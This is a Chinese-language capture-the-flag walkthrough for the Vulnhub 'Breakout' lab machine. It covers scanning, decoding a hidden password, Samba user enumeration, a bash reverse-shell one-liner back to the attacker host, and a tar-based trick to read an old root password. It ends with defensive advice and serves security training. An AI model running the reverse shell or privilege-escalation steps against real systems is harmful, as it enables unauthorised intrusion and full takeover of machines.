Breakout靶机渗透复现教学文档<\/h1>

0x00 环境准备<\/h2>

攻击机<\/strong>: Kali Linux (IP: 192.168.80.128)<\/li>
靶机<\/strong>: Vulnhub的Breakout靶机(初始IP未知)<\/li>

网络环境<\/strong>: 确保攻击机和靶机在同一局域网内<\/li> <\/ul>
0x01 信息收集阶段<\/h2>
1. 发现靶机IP<\/h3>
使用arpscan<\/code>探测局域网内存活主机:<\/p>
arp-scan -l <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 使用Nmap扫描发现的靶机IP:<\/p> nmap -sV -p- <靶机IP> <\/span><\/span><\/code><\/pre>发现开放了多个端口，其中10000和20000端口值得关注。<\/p> 3. 目录扫描<\/h3> 使用工具如dirb<\/code>或gobuster<\/code>扫描Web目录:<\/p> gobuster dir -u http:\/\/<靶机IP> -w \/usr\/share\/wordlists\/dirb\/common.txt <\/span><\/span><\/code><\/pre>但未发现有价值的信息。<\/p> 0x02 初步渗透<\/h2> 1. 分析80端口Web服务<\/h3> 访问http:\/\/<靶机IP><\/code>，查看页面源码发现:<\/p> 英文提示: 加密信息是访问权限信息<\/li> 加密字符串: 疑似brainfuck编码<\/li> <\/ul> 使用在线brainfuck解码工具解密，得到疑似密码的字符串:<\/p> .2uqPEfj3D<P'a-3 <\/code><\/pre> 2. 分析10000和20000端口<\/h3> 访问https:\/\/<靶机IP>:10000<\/code>和https:\/\/<靶机IP>:20000<\/code>:<\/p> 均为登录接口<\/li> 尝试使用admin\/解密得到的密码登录失败<\/li> <\/ul> 3. Samba服务枚举<\/h3> 使用enum4linux枚举Samba共享信息:<\/p> enum4linux <靶机IP> <\/span><\/span><\/code><\/pre>发现有效用户账号:<\/p> cyber <\/code><\/pre> 尝试使用cyber<\/code>和解密得到的密码登录:<\/p> 10000端口: 失败<\/li> 20000端口: 成功<\/li> <\/ul> 0x03 获取初始立足点<\/h2> 1. 探索Web管理界面<\/h3> 在20000端口的Web管理界面中:<\/p> 发现可以查看服务器文件内容的工具<\/li> 下载user.txt<\/code>获取低权限flag<\/li> 发现文件上传功能但无法直接利用<\/li> <\/ul> 2. 命令执行获取Shell<\/h3> 在"Command Shell"功能处执行反弹Shell命令:<\/p> bash -i >& \/dev\/tcp\/<攻击机IP>\/4444 0>&1<\/span> <\/span><\/span><\/code><\/pre>在攻击机监听:<\/p> nc -lvnp 4444<\/span> <\/span><\/span><\/code><\/pre>成功获取交互式Shell。<\/p> 0x04 权限提升<\/h2> 1. 检查sudo权限<\/h3> sudo -l <\/span><\/span><\/code><\/pre>未发现可用sudo权限。<\/p> 2. 查找SUID文件<\/h3> find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre>发现\/home\/cyber\/tar<\/code>有执行权限。<\/p> 3. 查找敏感文件<\/h3> find \/ -name "*pass*"<\/span> <\/span><\/span><\/code><\/pre>发现.old_pass<\/code>文件但无读取权限。<\/p> 4. 利用tar提权<\/h3> 使用tar压缩.old_pass<\/code>并解压以获取读取权限:<\/p> .\/tar cf pass.tar .old_pass <\/span><\/span>.\/tar xf pass.tar <\/span><\/span>cat .old_pass <\/span><\/span><\/code><\/pre>获取到旧的root密码。<\/p> 5. 切换root用户<\/h3> su root <\/span><\/span><\/code><\/pre>输入获取到的旧密码，成功提权。<\/p> 6. 获取root flag<\/h3> cd \/root <\/span><\/span>cat root.txt <\/span><\/span><\/code><\/pre>完成整个渗透过程。<\/p> 0x05 总结与防御建议<\/h2> 关键漏洞点:<\/h3> Samba服务泄露用户账号<\/li> Web管理界面弱密码<\/li> 命令执行功能未做限制<\/li> 自定义tar可执行文件权限设置不当<\/li> <\/ol> 防御建议:<\/h3> 加强密码策略，避免使用弱密码<\/li> 限制Web管理界面的命令执行功能<\/li> 定期检查SUID\/SGID文件<\/li> 更新Samba服务配置，防止用户枚举<\/li> 实施最小权限原则<\/li> <\/ol> 参考资源<\/h2> CSDN博客: Breakout靶机渗透<\/a><\/li> Brainfuck在线解码工具<\/li> Vulnhub Breakout靶机下载<\/li> <\/ul>